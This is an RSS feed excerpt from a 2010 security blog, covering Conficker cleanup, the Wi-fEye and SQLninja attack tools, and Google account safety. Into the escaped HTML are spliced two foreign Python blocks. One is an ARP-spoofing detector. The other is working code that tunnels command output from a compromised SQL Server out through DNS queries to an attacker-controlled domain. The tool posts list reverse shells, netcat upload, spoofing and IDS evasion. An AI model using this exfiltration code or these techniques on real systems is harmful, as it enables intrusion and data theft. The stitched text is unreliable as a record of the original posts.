&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;The Conficker worm can also disable important services on your computer. In the screenshot of the Auto play dialog box below, the option Open folder to view files — Publisher not specified was added by the worm. The highlighted option — Open folder to view files — using Windows Explorer is the option that Windows provides and the option you should use.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;If you select the first option, the worm executes and can begin to spread itself to other computers.&lt;/div&gt;&lt;div class="separator" style="background-color: #cccccc; clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="background-color: #cccccc; clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="background-color: #cccccc; clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_Kic0h6eqy-A/TQSpUvxjoOI/AAAAAAAAAbs/dh-geQyZaDI/s1600/image004.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/_Kic0h6eqy-A/TQSpUvxjoOI/AAAAAAAAAbs/dh-geQyZaDI/s320/image004.jpg" width="300" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;The option Open folder to view files — Publisher not specified was added by the worm.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;Illustration of working :&lt;/div&gt;&lt;div class="separator" style="background-color: #cccccc; clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_Kic0h6eqy-A/TQSpxPj-k6I/AAAAAAAAAbw/w1MJAucxPdk/s1600/image003.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="http://3.bp.blogspot.com/_Kic0h6eqy-A/TQSpxPj-k6I/AAAAAAAAAbw/w1MJAucxPdk/s400/image003.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="background-color: #cccccc;"&gt;&lt;b&gt;&lt;u&gt;Quick Remedies and Information for such Situations:&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="background-color: #cccccc;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;1.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;If your computer is infected with the Conficker worm, you may be unable to download certain security products, such as the &lt;a href="http://www.microsoft.com/security/malwareremove/default.aspx" target="_blank"&gt;Microsoft Malicious Software Removal Tool&lt;/a&gt; or you may be unable to access certain Web sites, such as &lt;a href="http://go.microsoft.com/fwlink/?LinkId=148275" target="_blank"&gt;Microsoft Update&lt;/a&gt;. If you can't access those tools, try using the &lt;a href="http://onecare.live.com/site/en-us/default.htm?s_cid=sah" target="_blank"&gt;Windows Live safety scanner&lt;/a&gt;.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;2.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Alternatively you can also try downloading AVG Antivirus and scan the machines.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;3.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Also  you might want to update the antivirus at client site with latest  information. And also the patches on desktops &amp;amp; servers to the  latest ones.&lt;/div&gt;&lt;div style="background-color: #cccccc;"&gt;4.&lt;span style="font: 7pt &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Scan your Computers with Both Anti-Virus and Anti-Spyware software.&lt;/div&gt;&lt;script type="text/javascript"&gt;
&lt;/script&gt; &lt;script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"&gt;
&lt;/script&gt;&lt;br /&gt;
&lt;br /&gt;
We thank Gaurav for sharing his valuable experience with us and expect to receive many such articles from other people reading this post too.&lt;br /&gt;
&lt;br /&gt;
If you have something to say on Ethical Hacking or Information Security, mail us your articles at &lt;b&gt;amey [at] techkranti [dot] com&lt;/b&gt; and we'll publish them for you.&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/Z9yvDNaI7kw" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/Z9yvDNaI7kw/nuisance-of-conficker.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_Kic0h6eqy-A/TQSpUvxjoOI/AAAAAAAAAbs/dh-geQyZaDI/s72-c/image004.jpg" height="72" width="72" /><thr:total>0</thr:total><georss:featurename>Mumbai, Maharashtra, India</georss:featurename><georss:point>19.0176147 72.8561644</georss:point><georss:box>18.6930332 72.3892454 19.3421962 73.3230834</georss:box><feedburner:origLink>http://www.techkranti.com/2010/12/nuisance-of-conficker.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-4388884743011522669</guid><pubDate>Mon, 15 Nov 2010 09:30:00 +0000</pubDate><atom:updated>2010-11-15T15:00:01.714+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><category domain="http://www.blogger.com/atom/ns#">Security Tools</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><title>Wi-fEye - An automated network penetration testing tool</title><description>Wi-fEye is designed to help with network penetration testing. Wi-fEye will allow you to perform a number of powerful attacks automatically; all you have to do is launch Wi-fEye, choose which attack to perform, select your target and let Wi-fEye do the magic!&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_Kic0h6eqy-A/TOD5O8jrgvI/AAAAAAAAAbo/Yn0gDHPWxW4/s1600/logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="81" src="http://3.bp.blogspot.com/_Kic0h6eqy-A/TOD5O8jrgvI/AAAAAAAAAbo/Yn0gDHPWxW4/s320/logo.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;big&gt;Wi-fEye is divided to four main menus:&lt;/big&gt;&lt;br /&gt;
1. Cracking menu: This menu will allow you to:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;small&gt;Enable monitor mode&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;View available Wireless Networks&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Launch Airodump-ng on a specific AP&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;WEP cracking: this will allow you to perform the following attacks automatically:&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Interactive packet replay.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Fake Authentication Attack.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Korek Chopchop Attack.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Fragmentation Attack.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Hirte Attack (cfrag attack).&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Wesside-ng.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;WPA Cracking: This contains the following attacks:&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;&amp;nbsp;Wordlist Attack&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;&amp;nbsp;Rogue AP Attack.&lt;/small&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
2.&amp;nbsp; Mapping: this menu will allow you to do the following:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;small&gt;Scan the network and view the connected hosts.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Use Nmap Automatically.&lt;/small&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
3. MITM: this menu will allow you to do the following Automatically:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;small&gt;Enable IP forwarding.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;ARP Spoof.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Launch ettercap (Text mode).&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Sniff SSL/HTTPS traffic.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Sniff URLs and send them to browser.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Sniff messages from instant messengers.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Sniff images.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;DNS Spoof.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;HTTP Session Hijacking (using Hamster).&lt;/small&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
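The ARP spoof step in the MITM menu is the one the victim side can actually watch for. As an added example that is not from the post or from Wi-fEye, here is a detector for the two symptoms ARP cache poisoning leaves in a capture: an IP whose "is-at" MAC flips, and one MAC claiming several IPs (arpspoof poisons both the victim and the gateway with the attacker's address). The capture lines are constructed, the line format is the one tcpdump prints for ARP replies with -n, and the function name is this example's own.&lt;br /&gt;

```python
import re
from collections import defaultdict

# Matches `tcpdump -n arp` reply lines: "TIMESTAMP ARP, Reply IP is-at MAC, length N" (format assumed here)
ARP_REPLY_RE = re.compile(
    r"^(\S+) ARP, Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ((?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def detect_arp_spoof(lines, gateway_ip=None):
    """Return a list of alerts found in tcpdump ARP reply lines.
    The first MAC seen for an IP is treated as trusted (in production, seed this from a static table
    or a DHCP lease database instead of trusting the first packet)."""
    trusted = {}                    # ip -> first MAC learned for it
    ips_by_mac = defaultdict(set)   # mac -> every IP it has claimed
    reported = set()                # (ip, mac) pairs already alerted on, so repeated poison frames do not spam
    alerts = []
    for line in lines:
        m = ARP_REPLY_RE.match(line)
        if not m:
            continue                # requests and non-ARP lines carry no "is-at" claim
        ts, ip, mac = m.group(1), m.group(2), m.group(3).lower()
        ips_by_mac[mac].add(ip)
        if ip not in trusted:
            trusted[ip] = mac
        elif trusted[ip] != mac and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append({"kind": "mac_changed", "ts": ts, "ip": ip, "old": trusted[ip], "new": mac,
                           "gateway": ip == gateway_ip})
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:            # one station answering for several IPs is the arpspoof signature
            alerts.append({"kind": "mac_claims_many", "mac": mac, "ips": sorted(ips)})
    return alerts


# Constructed capture: a legitimate gateway and client, then an attacker poisoning both directions
SAMPLE_CAPTURE = """\
10:00:01.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
10:00:02.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.20, length 28
10:00:02.100000 ARP, Reply 192.168.1.20 is-at 66:77:88:99:aa:bb, length 28
10:00:05.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
10:00:05.000100 ARP, Reply 192.168.1.20 is-at de:ad:be:ef:00:01, length 28
10:00:06.000000 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
"""

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_CAPTURE.splitlines(), gateway_ip="192.168.1.1"):
        print(alert)
```

A gateway alert is the one to act on first: once the gateway's MAC flips to an attacker, every step later in this menu (SSL sniffing, DNS spoofing, session hijacking) is possible against that client.&lt;br /&gt;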
4. Others: this menu will allow you to do the following automatically:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;&lt;small&gt;Change MAC Address.&lt;/small&gt;&lt;/li&gt;
&lt;li&gt;&lt;small&gt;Hijack software updates (using Evilgrade).&lt;/small&gt;&lt;br /&gt;
&lt;/li&gt;
&lt;/ul&gt;Official website: &lt;a href="http://wi-feye.za1d.com/"&gt;http://wi-feye.za1d.com/&lt;/a&gt;&lt;br /&gt;
Download page: &lt;a href="http://wi-feye.za1d.com/Download.html"&gt;http://wi-feye.za1d.com/Download.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: #fff2cc;"&gt;Get Updates for Hacking&amp;nbsp; Tools on your mobile.&lt;/div&gt;&lt;div style="background-color: #fff2cc;"&gt;Subscribe to &lt;a href="http://labs.google.co.in/smschannels/subscribe/techkranti" style="font-family: Arial,Helvetica,sans-serif;"&gt;TechKranti's   SMS channel&lt;/a&gt; &lt;/div&gt;&lt;div style="background-color: #fff2cc;"&gt;Subscribe to TechKranti's feeds &lt;a href="http://feeds.feedburner.com/blogspot/Gotp"&gt;&lt;img height="30" src="http://2.bp.blogspot.com/_Kic0h6eqy-A/S4ys7B1W7QI/AAAAAAAAAS8/7ituXPkPyNc/s1600/128px-Feed-icon.svg.png" width="30" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/abIl62mOHYE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/abIl62mOHYE/wi-feye-automated-network-penetration.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_Kic0h6eqy-A/TOD5O8jrgvI/AAAAAAAAAbo/Yn0gDHPWxW4/s72-c/logo.png" height="72" width="72" /><thr:total>0</thr:total><georss:featurename>Mumbai, Maharashtra, India</georss:featurename><georss:point>19.0176147 72.8561644</georss:point><georss:box>18.6930332 72.3892454 19.3421962 73.3230834</georss:box><feedburner:origLink>http://www.techkranti.com/2010/11/wi-feye-automated-network-penetration.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-5376515436910676244</guid><pubDate>Mon, 15 Nov 2010 09:01:00 +0000</pubDate><atom:updated>2010-11-15T14:31:51.466+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking Tools</category><category domain="http://www.blogger.com/atom/ns#">Security Tools</category><category domain="http://www.blogger.com/atom/ns#">Ethical Hacking</category><category domain="http://www.blogger.com/atom/ns#">Backtrack</category><title>SQLninja - An SQL Server 
injection &amp; takeover tool</title><description>Fancy going from a SQL injection on Microsoft SQL Server to full GUI access on the DB? Take a few new SQL injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have just one of the attack modules of sqlninja!&lt;br /&gt;
Sqlninja is a tool for exploiting SQL injection vulnerabilities in web applications that use Microsoft SQL Server as their back-end.&lt;br /&gt;
Its main goal is to provide remote access to the vulnerable DB server, even in a very hostile environment. It is meant for penetration testers, to help automate the process of taking over a DB server once a SQL injection vulnerability has been discovered.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_Kic0h6eqy-A/TOD1iglswDI/AAAAAAAAAbk/_OG15-8VJt8/s1600/logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="78" src="http://1.bp.blogspot.com/_Kic0h6eqy-A/TOD1iglswDI/AAAAAAAAAbk/_OG15-8VJt8/s400/logo.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)&lt;/li&gt;
&lt;li&gt;Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)&lt;/li&gt;
&lt;li&gt;Privilege escalation to sysadmin group if 'sa' password has been found&lt;/li&gt;
&lt;li&gt;Creation of a custom xp_cmdshell if the original one has been removed&lt;/li&gt;
&lt;li&gt;Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)&lt;/li&gt;
&lt;li&gt;TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell&lt;/li&gt;
&lt;li&gt;Direct and reverse bindshell, both TCP and UDP&lt;/li&gt;
&lt;li&gt;DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)&amp;nbsp;&lt;/li&gt;
&lt;li&gt;Evasion techniques to confuse a few IDS/IPS/WAF&lt;/li&gt;
&lt;li&gt;Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection&lt;/li&gt;
&lt;li&gt;Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
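How the DNS-tunneled pseudo-shell in the list above gets data out when no TCP or UDP port is reachable, as an added illustration that does not reproduce sqlninja's own wire format: the compromised SQL Server is made to resolve a series of hostnames (for instance by running nslookup through xp_cmdshell, which is an assumption of this example) whose leftmost labels carry the command output, and the attacker, who runs the authoritative name server for the domain, reassembles the chunks from the queries that arrive. The name layout, chunk size, the x-eof terminator label and the domain tun.example.com are this example's own choices; the sample output is constructed.&lt;br /&gt;

```python
import base64
import re

LABEL_MAX = 63      # RFC 1035 label limit
NAME_MAX = 253      # practical limit for a full name
EOF = "x-eof"       # terminator label; "-" cannot occur in base32, so it never collides with a payload chunk


def encode_output(data, session, domain, chunk=30):
    """Turn command output into DNS names the compromised server can resolve.
    Layout assumed here: base32chunk.seq.session.domain, then x-eof.count.session.domain.
    Base32 is used because DNS names are case-insensitive; padding is dropped and restored on decode."""
    b32 = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    pieces = [b32[i:i + chunk] for i in range(0, len(b32), chunk)]
    names = [f"{piece}.{seq}.{session}.{domain}" for seq, piece in enumerate(pieces)]
    names.append(f"{EOF}.{len(pieces)}.{session}.{domain}")   # tells the receiver how many chunks to expect
    for name in names:
        if len(name) > NAME_MAX or max(len(label) for label in name.split(".")) > LABEL_MAX:
            raise ValueError("name too long for DNS: " + name)
    return names


# payload . seq . session . domain  (groups 1..4)
QUERY_RE = re.compile(r"^([a-z2-7-]+)\.(\d+)\.([a-z0-9]+)\.(.+)$")


def decode_queries(queries, session, domain):
    """Reassemble output from the names that reached the attacker's authoritative DNS server.
    Resolvers retry and reorder, so duplicates are ignored and chunks are placed by sequence number;
    unrelated queries for the zone are skipped. Returns None while chunks are still missing."""
    chunks, total = {}, None
    for q in queries:
        m = QUERY_RE.match(q.lower().rstrip("."))
        if not m or m.group(3) != session or m.group(4) != domain:
            continue
        payload, seq = m.group(1), int(m.group(2))
        if payload == EOF:
            total = seq
        else:
            chunks.setdefault(seq, payload)     # first copy wins; retries carry identical data
    if total is None or any(i not in chunks for i in range(total)):
        return None
    b32 = "".join(chunks[i] for i in range(total)).upper()
    return base64.b32decode(b32 + "=" * (-len(b32) % 8))


# Constructed sample: output of `whoami` on the DB host, and the query order a resolver might produce
DOMAIN = "tun.example.com"
SESSION = "s1"
SAMPLE_OUTPUT = b"nt authority\\network service\r\n"
NAMES = encode_output(SAMPLE_OUTPUT, SESSION, DOMAIN)
# reversed order, two retransmitted queries, and one unrelated lookup of the same zone
SEEN_BY_ATTACKER = NAMES[::-1] + NAMES[:2] + ["www.tun.example.com"]

if __name__ == "__main__":
    for name in NAMES:
        print(name)
    print(decode_queries(SEEN_BY_ATTACKER, SESSION, DOMAIN))
```

On the defensive side the same properties are the detection signal: long, high-entropy leftmost labels, many unique subdomains under one zone, and queries originating from a database server that has no business resolving external names at all.&lt;br /&gt;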
&lt;h1&gt;Platforms supported&lt;/h1&gt;Sqlninja is written in Perl and should run on any UNIX-based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Linux&lt;/li&gt;
&lt;li&gt;FreeBSD&lt;/li&gt;
&lt;li&gt;Mac OS X&lt;/li&gt;
&lt;/ul&gt;&lt;br /&gt;
Download Page: &lt;a href="http://sqlninja.sourceforge.net/"&gt;http://sqlninja.sourceforge.net/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="background-color: rgb(255, 242, 204);"&gt;Get Security News on your mobile.&lt;/div&gt;&lt;div style="background-color: rgb(255, 242, 204);"&gt;Subscribe to &lt;a href="http://labs.google.co.in/smschannels/subscribe/techkranti" style="font-family: Arial,Helvetica,sans-serif;"&gt;TechKranti's   SMS channel&lt;/a&gt;&lt;/div&gt;&lt;div style="background-color: rgb(255, 242, 204);"&gt;Subscribe to TechKranti's feeds &lt;a href="http://feeds.feedburner.com/blogspot/Gotp"&gt;&lt;img src="http://2.bp.blogspot.com/_Kic0h6eqy-A/S4ys7B1W7QI/AAAAAAAAAS8/7ituXPkPyNc/s1600/128px-Feed-icon.svg.png" width="30" height="30"&gt;&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/TWNXQA6JFw0" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/TWNXQA6JFw0/sqlninja-sql-server-injection-takeover.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Kic0h6eqy-A/TOD1iglswDI/AAAAAAAAAbk/_OG15-8VJt8/s72-c/logo.png" height="72" width="72" /><thr:total>0</thr:total><georss:featurename>Mumbai, Maharashtra, India</georss:featurename><georss:point>19.0176147 72.8561644</georss:point><georss:box>18.6930332 72.3892454 19.3421962 73.3230834</georss:box><feedburner:origLink>http://www.techkranti.com/2010/11/sqlninja-sql-server-injection-takeover.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2208382470258337434.post-8677478017606307795</guid><pubDate>Mon, 18 Oct 2010 11:56:00 +0000</pubDate><atom:updated>2010-11-15T14:32:49.581+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Security News</category><title>Protect your data in the cloud says Priya Nayak, Consumer Operations, Google Accounts</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;Like many people, you probably store a lot of 
important information in your Google Account. I personally check my Gmail account every day (sometimes several times a day) and rely on having access to my mail and contacts wherever I go. Aside from Gmail, my Google Account is tied to lots of other services that help me manage my life and interests: photos, documents, blogs, calendars, and more. That is to say, my Google Account is very valuable to me.&lt;br /&gt;
&lt;br /&gt;
Unfortunately, a Google Account is also valuable in the eyes of spammers and other people looking to do harm. It’s not so much about your specific account, but rather the fact that your friends and family see your Google Account as trustworthy. A perfect example is the “Mugged in London” phishing scam that aims to trick your contacts into wiring money — ostensibly to help you out. If your account is compromised and used to send these messages, your well-meaning friends may find themselves out a chunk of change. If you have sensitive information in your account, it may also be at risk of improper access.&lt;br /&gt;
&lt;br /&gt;
As part of National Cyber Security Awareness month, we want to let you know what you can do to better protect your Google Account.&lt;br /&gt;
&lt;b&gt;Stay one step ahead of the bad guys&lt;/b&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Account hijackers prey on the bad habits of the average Internet user. Understanding common hijacking techniques and using better security practices will help you stay one step ahead of them.&lt;br /&gt;
&lt;br /&gt;
The most common ways hijackers can get access to your Google password are:&lt;br /&gt;
* Password re-use: You sign up for an account on a third-party site with your Google username and password. If that site is hacked and your sign-in information is discovered, the hijacker has easy access to your Google Account.&lt;br /&gt;
* Malware: You use a computer with infected software that is designed to steal your passwords as you type (“keylogging”) or grab them from your browser’s cache data.&lt;br /&gt;
* Phishing: You respond to a website, email, or phone call that claims to come from a legitimate organization and asks for your username and password.&lt;br /&gt;
* Brute force: You use a password that’s easy to guess, like your first or last name plus your birth date (“Laura1968”), or you provide an answer to a secret question that’s common and therefore easy to guess, like “pizza” for “What is your favorite food?”&lt;br /&gt;
&lt;br /&gt;
As you can see, hijackers have many tactics for stealing your password, and it’s important to be aware of all of them.&lt;br /&gt;
&lt;b&gt;Take control of your account security across the web&lt;/b&gt;&lt;br /&gt;
Online accounts that share passwords are like a line of dominoes: When one falls, it doesn’t take much for the others to fall, too. This is why you should choose unique passwords for important accounts like Gmail (your Google Account), your bank, commerce sites, and social networking sites. We’re also working on technology that adds another layer of protection beyond your password to make your Google Account significantly more secure.&lt;br /&gt;
Choosing a unique password is not enough to secure your Google Account against every possible threat. That’s why we’ve created an easy-to-use checklist to help you secure your computer, browser, Gmail, and Google Account. We encourage you to go through the entire checklist, but want to highlight these tips:&lt;br /&gt;
&lt;br /&gt;
* Never re-use passwords for your important accounts like online banking, email, social networking, and commerce.&lt;br /&gt;
&lt;br /&gt;
* Change your password periodically, and be sure to do so for important accounts whenever you suspect one of them may have been at risk. Don’t just change your password by a few letters or numbers (“Aquarius5” to “Aquarius6”); change the combination of letters and numbers to something unique each time.&lt;br /&gt;
&lt;br /&gt;
* Never respond to messages, non-Google websites, or phone calls asking for your Google username or password; a legitimate organization will not ask you for this type of information. Report these messages to us so we can take action. If you responded and can no longer access your account, visit our account recovery page.&lt;br /&gt;
&lt;br /&gt;
We hope you’ll take action to ensure your security across the web, not just on Google. Run regular virus scans, don’t re-use your passwords, and keep your software and account recovery information up to date. These simple yet powerful steps can make a difference when it really counts.&lt;br /&gt;
SOURCE: &lt;a href="http://googleonlinesecurity.blogspot.com/2010/10/protecting-your-data-in-cloud.html"&gt;Google Online Security Blog&lt;/a&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/Gotp/~4/FSjY7PYqgEE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/blogspot/Gotp/~3/FSjY7PYqgEE/protect-your-data-in-cloud-says-priya.html</link><author>noreply@blogger.com (Rahul Sachin Amey)</author><thr:total>0</thr:total><feedburner:origLink>http://www.techkranti.com/2010/10/protect-your-data-in-cloud-says-priya.html</feedburner:origLink></item></channel></rss>
